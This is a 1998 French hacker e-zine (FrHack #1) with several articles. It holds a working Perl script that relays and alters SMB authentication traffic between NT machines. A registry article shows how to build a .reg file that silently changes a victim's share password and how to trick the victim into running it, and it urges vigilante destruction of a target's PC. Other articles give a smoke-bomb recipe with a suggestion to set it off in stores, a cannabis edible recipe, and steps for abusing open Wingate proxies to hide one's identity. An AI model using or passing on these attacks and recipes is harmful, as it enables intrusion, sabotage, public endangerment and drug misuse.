_______________________________________________________





LA DEUXIÈME VERSION DU CHEVAL (port OK):








Premièrement, appuyez sur CTRL + ALT + SUPPR





Fermez le programme nommez Csmctrl32.exe


Quelques secondes un autre tableau apparait, recliquez


sur FIN DE TACHE.


Allez enlever le fichier Csmctrl32.exe se trouvant dans


\WINDOWS\SYSTEM\








Maintenant, vous n'êtes plus infecté de ce cheval!





-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= Un petit exploit pour NT =-
(par un GURU de la sécurité)

#!/usr/bin/perl
# USAGE:
# perl smb-not-secure.pl <localip> <remoteip>
# for example
# perl smb-not-secure.pl 192.168.2.13 192.168.2.10
#
# Ce programme redigirige des autentifications d'une machinne NT vers une
# autre sur un reseau local.
#
# Attention ce program ne marche que si vous vouz trouvez sur le meme brin
# ethernet physique que la remote IP .
# attention :
# Ce programme est destine a l'utilisation dans un but educatif .
# Et ne pourra etre utilise a d'autres fins .
# l'auteur de ce programme ne pourra etre tenu responsable de l'utilisation
# de ce programme.
# NE l'oubliez pas, ce programme est cree dans un but educatif (pour faire
# le bien) et non pas dans un autre but.
# En definitif :
# ce programme s'adresse au personne desirant s'informer sur la securite
# informatique, ce programme ne devra pas etre redistribue mais garde a
# l'usage prive.
# Merci d'avance.

use IO::Socket;
use IO::Select;

if ($#ARGV != 1) {
print "Usage: redirect.pl <localip> <remoteip>\n";
exit 0;
}

my $local = $ARGV[0];
my $target = $ARGV[1];

my $smbport = "139";
my $Msg;

my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

print "setting up redirection from $local to $target ...\n";

$sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
Proto=>'tcp',Listen=>5,Reuse=>1);
while (1) {

print "listening on $local\n";

$IS = $sock1->accept() || die;

$OS = new
IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') ||
die;

print "connected to $target\n";

$rs = new IO::Select();
$rs->add($IS,$OS);

$first = 1;
$finished = 0;

while(! $finished) {
($r_ready) = IO::Select->select($rs,undef,undef,undef);

foreach $i (@$r_ready) {
$o = $OS if $i == $IS;
$o = $IS if $i == $OS;

recv($i,$Msg,8192,0);
if (! length $Msg) {
$finished = 1;
break;
}



if ($first && substr($Msg,0,1) eq "\x81") {
print "replacing called name\n";
$msg2 =
join('',substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37));
send($o,$msg2,0);
$first = 0;
} else {
if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}
send($o,$Msg,0);
}
}
}
}

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= La base de registre: Comment ca marche =-
(Par Utopiste)

Dans les version de windows 3.11 on avait le droit a un paquet de .ini, mais avec l"
arriver de windaube 95, la base de registre qui a prit une importance énorme et a
pratiquement éliminer les .ini. En gros la base de registre sert a entreproser les
options de configuration de l'ordinateur et des logiciels. c'est informations sont
stocker dans les fichier user.dat et system.dat, le fichier system.dat comprend les
informations global a tous les utilisateur et au matériel, alors que le user.dat
stocke seulement les informations pour un utilisateur (c'est pour ca que chaque
utilisateur de windaube peut avoir ses préférence a lui)

Comment peut-on hacker avec la page de registre... c'Est simple, en allant modifier
des donné de configuration à l'intérieur, on peut ainsi souvent enlever des protections
, devier des outputs sur d'autre fichier, et enlever des mot de passe (vous pouvez pas
toujours trouver le mot de passe, cepandant vous pouvez mettre l'option: mot de passe actif
a faux...)

Pour acceder a la base de registre manuellement on peut utiliser l'application:
RegEdit.exe (qui vient avec windaube). Le fonctionnement est simple et amuser vous dedans
voir comment c'est construit

Je vous montrerai po comment aller modifier la base de registre manuellement dans cet
article pour ceux qui sont intéresser aller lire l'api de windows, la fonction est
writeprofilestring si je me rappelle bien (je dit ca de mémoire)


Bon maintenant comment faire des fichier .reg
les fichier ayant l'extension .reg mettre a jour directement la base de registre comme
il le fichier mets les informations avant et apres dit a l'utilisateur qui viens
de modifier la base de registre, nous somme souvent correcte dans la pluspart des
cas

Structure d'un fichier .reg

---------< Couper ici> -----------------

REGEDIT4
; Ceci est un exemple fichier mettant à jour la base de registre
; les ligne commancant par un ; sont des commentaire

;========================================
; Faire que la page de démarrage de windaube inet explorer devienne la page de frhack
;========================================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"start page"="www.frhack.org"

; la ligne [] signifi la clé, la " " avant le = est pour la sous-clé
; et le "" est pour la valeur de cet clé (en passant les "" sont obligatoire)

--------< Couper ici >------------------

Bon passons a des exemple plus pratique: vous trouvez un pédophile sur internet, décider à aider
la planete vous voulez scraper son ordi (Truc: comme il s'agit d'un pédophile con et lame,
enlever seulement les fichier genre le command.com et marquer dans l'autoexec.bat en commentaire
une note comme koi qui a des photo de pédo sur l'ordi dans tel répertoire, comme l'ordi sera
scap il va aller le faire réparer et vous avez une chance sur deux que les techniciens le dénonce)
Vous utiliser l'exploir netbios (yé a qq dans ce emag) pis oui, il a a son C partager (toujours
possible). Cepandant un net use vous apprend qui a mit un mot de passe dessus.
alors que faire ? maintenant plus besoin d'appeller le 911, vous pouvez faire de koi... (bon
a condition que la personne soit d'accord pour ouvrir un fichier genre photopedo.reg (comme les
.reg sont souvent inconnu il risque de dire ok )

parlons plus technique, les mot de passe des ressource partager sont dans la base de registre
(hum, intéressant) il sont coder et j'ai pas encore eu le temps de vérifier l'algorithme
(j'ai penser a écrire cet article 1 heure avant la sorti de frhack # 1) mais on va se simplifier
la vie (l'informatique sert a ca) pis voila ce qu'on va faire:

1) se faire une ressource partager et marquer un mot de passe que l'on veut (celui qui se
retrouvera sur l'ordi du gars plus tard) (on a fait le test avec frhack)

(je tiens a remercier bubble qui m'a servi de cobaye pour ce test)

2) Aller dans la base de registre à la clé suivante:
Local machine->software->microsoft->windows->

3) localiser vous devriez voir deux sous-clé
1) "parm1enc"="73 C8 05 E7 10 E2"
2) "parm2enc"="73 C8 05 E7 10 E2"

73,C8,05,E7,10,E2
la premiere contient le mot de passe de lecture, l'autre de l'écriture


4) copier la valeur a quelque part pour pas l'oublier

5) créer un fichier texte (qui sera un .reg)

---------< couper ici >----------------

REGEDIT4
; changer le mot de passe de la ressource partager C par le mot de passe frhack
; (c) Utopiste
;


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]
"parm1enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00
"parm2enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00


; (note: remplacer C par la ressource partager) et comme valeur marque ce que vous avez
; noter quand vous avez noter le mot de passe de votre ressource parager
; je suis po sur si ca prend le paquet de 0 mais je manque de temps pour tester
; c'est p-e pas très clair mais en tout cas ca vous dit les principes de bases
;

----------< couper ici >---------------

Envoyer le fichier au gars, quand il l'ouvrira en double cliquant dessus ca va modifier
son mot de passe de sa ressource partager

Comme prochain article vous aurez un petit texte sur l'utilisation des .inf et peut-etre
aussi un complement sur les .reg (j'ignore encore s'il va parraitre dans les emag de FrHack
ou dans celui de TC (je leur ai promit un article))

J'espere que ce petit truc vous sera utile

Utopiste
(Utopiste@hotmail.com)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-

-=La Bombe fumogène=-
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Le contenu de ce texte est à but informatif seulement et nous nous tenons
pas responsable de l'usage que vous pouvez en faire.
KneWoN

Pour Réaliser la bombe fumogène,vous avez besoin
de:
-Salpêtre(*nitrate de sodium(ou potassium...)) /* de po
-Sucre
-Eau
-Poêle(les ronds)
-Plaque à buiscuits(plaque en métal)
-Papier d'alluminium

* :Je ne suis pas trop sur du nom scientifique du
salpêtre.

Étape #1:SE PROCURER DU SALPÊTRE
Vous pouvez trouver ce produit chez toute bonne pharmacie(Jean c*utu).Je vous
conseille d'acheter un pot de 125g(environ 5$ canadien).

Étape #2:FAIRE LE MÉLANGE
Prendre du salpêtre,pas trop,le mettre dans un bol avec du sucre(je ne sais pas
exactement les doses...vous n'avez qu'à expérimenter et vous allez découvrir ce
qui vous suffit;c'est pour celà que je vous conseille de commencer par de petites
doses).Ajouter de l'eau(pas trop) pour former une pâte.Vous avez votre mélange.

Étape #3:LA CUISSON
Former une petite boite en papier d'aluminium dans laquelle vous déposez le mélange.
Ouvrez les ronds de votre poele.Déposez la plaque à biscuits sur le rond.Mettre la
boite d'aluminium contenant le mélange sur la plaque(au dessus du rond pour la
meilleur cuisson et répartition). Attendre que le salpêtre devienne de couleur
Beige jusqu'à Brun pâle(Surveillez bien ça car ça pourrait prendre en feu...).Fermer
le rond et retirer la boite d'aluminium.

Étape #4:LA TOUCHE FINALE
Laisser sécher le tout.Pour des résultats rapides, vous pouvez le mettre dans le
congélateur.Vous pouvez aussi enfoncer une mèche dans le mélange pendant qu'il est
encore mou(dépendant des préférences).

Étape #5:VOUS ÊTES PRÊTS?
Votre bombe est maintenant prête.Il suffit de mettre feu à la croute ou à la mèche
si vous en avez une.
ATTENTION!!! Le feu yé pomal chaud...quand la bombe est pognée...ça fait fondre
le papier d'aluminium.

J'espère que celà vous a amusé et si jamais il y a des erreurs,informations complémentaires
ou suggestions, n'hésitez pas à me contacter (#hack.fr sur undernet ou bin knewon@hotmail.com).
Dernière recommandation...ne faites pas ça au four... Je sais de quoi je parle. Vous allez bien
vous amuser si vous en placez dans les épiceries et les dépanneurs... hehe

P.S.:Je vais surement écrire un texte complémentaire au sujet de fabrication de mèches
artisanales. C'est purement hypothetique

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-
* Drugs *
( par MiStO )
(misto@bigfoot.com)

Pour le premier numéro du zine de hack.fr j'ai décidé de vous lâcher
la célèbre recette du SPACE YOGOURT...

Ce qu'il vous faut réunir :

- Un yogourt nature (0% de matière grasse pour les meufs :)
- De l'huile de tournesol (huile végétale pour friture...)
- Une grande cuillère
- Un petit bol en terre cuite...
- 2 grammes de résine de Cannabis

La recette :

Démouler le yogourt dans le bol, s'il y à de l'eau, égouttez-la.
Effriter vos 2 grammes dans la cuillère (évitez de faire de trop grosses
boulettes) puis mettez l'huile de tournesol par-dessus, jusqu'au quasi
remplissage de la cuillère.
Passer la cuillère sur la flamme d'une cuisinière (éviter le briquet).
Attention ! Ça va devenir très chaud !!!! pour ne pas vous brûler tenez
le manche de la petite cuillère avec une serviette.
Quand l'huile commence à frémir plongez d'un coup sec la cuillère dans
le bol contenant le yogourt.
Remuez énergiquement.

Dégustation :

Ce Space Yogourt est parfait pour une personne,
Ne pas le laissé reposer, dégustez-le de suite après l'avoir fait,
Il sera tiède, à la bonne température...
Le Space Yogourt est excellent nature mais pour ceux qui trouverait son
goût un peu fade vous pouvez rajouter de petits morceaux de menthe fraîche.

Effets :

Sur le coup vous n'allez pas sentir grand chose,
c'est pour cela que vous finirez le Space Yogourt,
mais dans les 5 minutes qui suivront la dégustation vous allez ressentir
comme une énorme claque qui va carrément vous scotcher à votre fauteuil
!!
vous ne pourrez pas bouger pendant environ 5 minutes,
votre tête va se mettre à tourner à 160 km/h TOP fUN! :)
une fois ces 5 minutes passées tout redeviendra normal ! puis toutes les
demi-heures cela vous refera cet effet !!! Pendant environ 2 heures pour
les initié et 6 heures pour les novices...
Accoutumance au Cyber Yogourt ? : aucune.

vOILA bon Hack et bonne défonce après :)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-
* Les Wingates *

On entend souvent parler sur les channels de hack de wingate. Sous ce nom barbare, ce cache en
fait la derniere technique a la mode pour masqué son adresse IP.

1) Qu'est ce qu'un wingate
Un wingate est un programme residant tournant sous windows NT/95 qui permet a des machines de
partager une conection modem, ce qui peut etre utile quand on possede plusieur ordi chez sois
et que l'on a une large bande passante.

Lors de l'installation de wingate sur une becane, les services suivant sont installé:
port service

23 serveur proxie telnet installation standart
1080 serveur de SOCK installé en plus si on utilise gatekeeper
6667 proxie irc installé en plus si on utilise gatekeeper

a) Le serveur proxie telnet
Lors de l'installation, aucun mot de passe n'est demandé, ni une fois l'installation terminé, ce
qui constitue une faiblesse. Cette abscence de mot de passe est la cause des probleme due a
l'utilisation des wingates. L'utilisation de wingate est des plus aisé, exemple:

* on effecue un telnet sur l'ip d'un wingate connue

#telnet ip_du_wingate 23

* la on tombe sur un prompt du type:

Wingate>

* la on rentre la machine ou on veux se connecter:
(le premier parametre est le l'adresse, la deuxième est le port)

Wingate> 123.213.201.1 25

* et c finis !


Une autre methode permet utilisable sur l'irc est la suivante
Dans la fenetre de status taper:
/server l'ip_de_ta_wingate
/raw eu.undernet.org 6667
/raw user nom_d'user U U : nom_reel
/raw nick un_nickname

* Comment trouver des wingate

Pour trouver des wingate il suffit d'utiliser un domain scanner qui balaye les port 23. Si
c un wingate le prompt

Wingate>

sera la et c bon. Un prog sert a ca, c'est wgatescan95-1_3.exe

une autre facon est d'utiliser un domain scanneur sur le port 1080 pour trouver
des port sock




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= Conclusion =-
(par Utopiste)

Et voila, ceci était le premier emag de FrHack, nous esperons que vous avez aimé, nous
comptons sortir un autre numéro le mois prochain 1 aout 1998, (si aucun d'entre nous
se fait buster entre temps, mais la scene survit toujours a un bust, alors il devrai
avoir un numéro en aout) Pour plusieurs d'entre nous il s'agit de notre premier emag,
alors nous avons apprit sur le tas, et nous sommes pas mécontant du résultat, avant de
finir je voudrai faire quelque remerciment: a tous le monde qui ont bosser sur ce emag
et m'ont envoyer des articles, a la pizzeria du coin qui reste ouvert 24 heure sur 24
(super au retour d'en hacking/phreaking tour), au hackeur en général, au monde qui
vienne sur #hack.fr et lui permette d,etre une place intéressante ou on peut parler
en toute tranquillité, aussi un remerciment a tout les rebelle et révolutionnaire
qui se batte pour la liberté individuele et a tous les autres que j'ai oublier de parler
pis qui se sente d'accord avec ce mag.

-= Pourkoi prédir le futur quand nous pouvons l'inventer ?? =-
(Utopiste)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= Commandite =-
AUCUNE !!!






next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT